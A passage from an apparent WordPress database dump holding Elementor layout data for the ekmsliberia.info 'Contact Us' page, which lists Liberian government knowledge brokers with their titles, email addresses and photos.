strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21847,3165,'_wp_attached_file','2020/10/1.jpg'),(21848,3165,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:13:\"2020/10/1.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21849,3166,'_elementor_edit_mode','builder'),(21850,3166,'_elementor_template_type','wp-page'),(21851,3166,'_elementor_version','2.8.1'),(21852,3166,'_wp_page_template','default'),(21853,3166,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"